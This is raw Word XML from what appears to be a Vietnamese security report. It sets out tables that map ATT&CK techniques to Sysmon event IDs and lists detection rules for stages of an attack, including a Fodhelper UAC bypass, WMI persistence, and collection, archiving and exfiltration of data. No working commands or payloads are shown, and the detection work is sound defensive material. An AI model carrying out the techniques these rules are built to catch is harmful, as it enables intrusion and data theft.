        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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901ECDE" w14:textId="6BB24C75" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="04E1FC15" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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213419C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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7C8F149" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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2DD61DA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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1FFA3FE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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742F8CD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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F4FACCA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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EA46C77" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="4DA545E1" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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C906600" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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AA60CED" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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F4AD4E9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1560.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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04D6CF62" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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FDE82D2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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564D902C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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8A0D8AC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="38F18AA1" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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876AB45" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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B954A6F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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9557266" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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E126003" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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1FA2C55" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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583792B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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FCC3A9D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4, C5, S4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="385A76F8" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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560040D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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F883E16" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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58C2CA40" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1070.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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3D5E79F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>File Del</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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00238799" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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E159AF9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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DE72A9C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6644B833" w14:textId="32E1044F" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A"/>
    <w:p w14:paraId="2AF0BE48" w14:textId="288041BE" w:rsidR="00602E07" w:rsidRDefault="00602E07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B66EE5D" wp14:editId="57C54EDC">
            <wp:extent cx="6120130" cy="4729480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182131012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10122" name="Graphic 1821310122"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                          <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId10"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4729480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="755B7635" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IX. DETECTION RULES THEO TỪNG PHASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D2CEDB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 Tổng Quan Bộ Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42568E49" w14:textId="766006A6" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Bộ detection gồm </w:t>
      </w:r>
      <w:r w:rsidR="001E275F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules được chia thành hai loại: Correlation Rules (C1-C5) sử dụng EQL sequence để bắt chuỗi sự kiện liên quan, và Signal Rules (S1-S</w:t>
      </w:r>
      <w:r w:rsidR="001E275F">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) là standalone rules phát hiện từng hành vi đơn lẻ. Triết lý thiết kế xuyên suốt: dựa trên behavioral invariants của MITRE ATT&amp;CK, không dựa vào artifact names có thể thay đổi.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1596"/>
        <w:gridCol w:w="1199"/>
        <w:gridCol w:w="940"/>
        <w:gridCol w:w="797"/>
        <w:gridCol w:w="1393"/>
        <w:gridCol w:w="2402"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01B4A" w14:paraId="350D6E95" w14:textId="77777777" w:rsidTr="001E275F">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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0D9D617C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1596"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69B19927" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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5D4D5577" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="940"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7AD4B06F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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4C819C57" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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2357A5ED" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Maxspan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402"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74853349" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5DA2515C" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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F5815BB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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1468B56" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UAC Bypass via Fodhelper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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A5C4B5F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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1C428EB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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D629C0F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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B09B961" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>30s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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F196E1F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.005 + T1548.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5AF62C36" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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71815CE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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2096271" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Persistence Full Install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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D126464" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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5A213EA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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5E2CBB4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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08AD8E1D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>30s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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05319A39" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="41A226B3" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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10AF39A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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C302893" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Consumer → Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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E9149C6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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6C7F784" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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06F3A7A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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62324A7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>30s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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D41D556" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1546.003 + T1082 + T1016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="770D599E" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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04B36E6F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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2A03DC9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Collection → Archive → Exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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086F4155" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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F2A105A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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BC2288E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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29AC3F3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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65C1E90" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1005 + T1560.001 + T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="748EE058" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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6340466" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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4999C97" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfil → Indicator Removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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4191709" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
